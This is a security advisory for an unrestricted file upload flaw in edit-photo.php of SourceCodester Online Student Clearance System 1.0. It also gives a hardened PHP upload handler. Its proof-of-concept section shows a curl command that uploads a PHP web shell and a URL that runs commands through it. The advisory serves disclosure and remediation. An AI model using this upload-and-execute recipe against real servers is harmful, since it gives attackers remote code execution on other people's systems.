Suspected 0day
PoC and technical advisory for CVE-2025-51046 – An unauthenticated RCE vulnerability in SourceCodester Online Student Clearance System 1.0 caused by improper file upload validation in edit-photo.php.
# CVE-2025-51046 - Remote File Upload Vulnerability in SourceCodester Online Student Clearance System v1.0
## Overview
* **CVE ID**: CVE-2025-51046
* **Vendor**: SourceCodester
* **Product**: Online Student Clearance System using PHP and MySQL
* **Version**: 1.0
* **Component**: `edit-photo.php` file upload functionality (and the `/uploads/` directory)
* **Attack Type**: Remote
* **Vulnerability Type**: Remote File Upload (leading to Remote Code Execution)
* **Discoverer**: Meshari Alluhaybi
---
## Description
SourceCodester Online Student Clearance System v1.0 has an unrestricted file upload vulnerability in the `edit-photo.php` file. The application does not validate or restrict the type of uploaded files, so an attacker can upload a PHP script (e.g., a web shell). The script is stored in the publicly accessible `/uploads/` directory, where a remote attacker can request it and execute arbitrary system commands on the server.
---
## Attack Vectors
An attacker can exploit this vulnerability by uploading a malicious PHP file through the file upload functionality in `edit-photo.php`. Because the upload handler applies no file type restriction or sanitization, the malicious file is stored in `/uploads/`, where it can be accessed directly and executed by the web server.
---
## Proof of Concept (PoC)
### 1. Upload the Web Shell

```bash
curl -F "userImage=@shell.php;type=application/x-php" -F "btnedit=" http://192.168.8.138/edit-photo.php
```

### 2. Execute Remote Commands

Access the uploaded shell:

```
http://192.168.8.138/uploads/shell.php?cmd=id
```

This command will execute the `id` command on the server, proving remote code execution.
---
## Affected Product Details
* **Vendor**: SourceCodester
* **Product**: Online Student Clearance System using PHP and MySQL
* **Version**: 1.0
* **Component**: `edit-photo.php` (file upload functionality) and `/uploads/` directory
---
## Impact
* Full remote code execution on the server
* Potential system compromise and privilege escalation
* Unauthorized manipulation of the web application
---
## Recommendations
* **File Upload Restrictions**: Enforce strict file extension whitelisting (e.g., allow only `.jpg`, `.png`).
* **MIME Type Verification**: Check MIME types on the server side to ensure files match allowed types.
* **Storage Location**: Store uploaded files outside the web root to prevent direct access.
* **File Renaming**: Rename uploaded files and remove original extensions to reduce risk.
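The following is an added example of a hardened upload handler that applies all four recommendations above; it is not the vendor's code and is not a patch for the product. It assumes the form field is still named `userImage` and the submit button `btnedit` (as in the PoC request), and that `UPLOAD_DIR` is a hypothetical directory outside the web root from which a separate script (not shown) serves images back with a fixed `Content-Type`.

```php
<?php
// Hardened replacement for a file-upload handler (added example, not the vendor's code).
// Assumptions (hypothetical): field names "userImage" and "btnedit" as in the PoC,
// UPLOAD_DIR lives outside the document root and is never mapped to a URL.
declare(strict_types=1);

const UPLOAD_DIR  = '/var/app-data/student-photos';   // outside the web root (assumption)
const MAX_BYTES   = 2 * 1024 * 1024;                   // 2 MiB cap
const ALLOWED_EXT = ['jpg', 'jpeg', 'png'];            // extension whitelist (client-supplied name)
const ALLOWED     = ['image/jpeg' => 'jpg', 'image/png' => 'png']; // sniffed MIME -> stored extension

function validate_and_store(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // 1. Extension whitelist: cheap first filter on the client's filename, never trusted alone.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException('extension not allowed');
    }

    // 2. Server-side MIME check on the actual bytes; the client's Content-Type header is ignored.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('content is not an allowed image type');
    }

    // Independent second check: the bytes must decode as an image of the same type.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('content does not parse as the declared image');
    }

    // 3./4. Random server-chosen name with a server-chosen extension, stored outside the web root.
    $newName = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest    = UPLOAD_DIR . DIRECTORY_SEPARATOR . $newName;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);   // readable by the app user, never executable
    return $newName;      // the only value persisted against the student record
}

if (isset($_POST['btnedit'], $_FILES['userImage'])) {
    try {
        $stored = validate_and_store($_FILES['userImage']);
        // persist $stored in the database here, then redirect back to the profile page
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```

The request from the PoC (`shell.php` sent with `type=application/x-php`) is rejected at the extension check, and a PHP file renamed to `.jpg` is rejected by the `finfo` and `getimagesize` checks because its bytes are not an image. Because the stored name is random and the directory is not web-served, even a polyglot that passes both content checks can never be requested as `/uploads/<name>.php`; as defence in depth, the web server should additionally be configured so that no script handler runs for any directory that holds user content.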
---
## References
* [SourceCodester](http://sourcecodester.com)
* [Online Student Clearance System](http://online.com)
---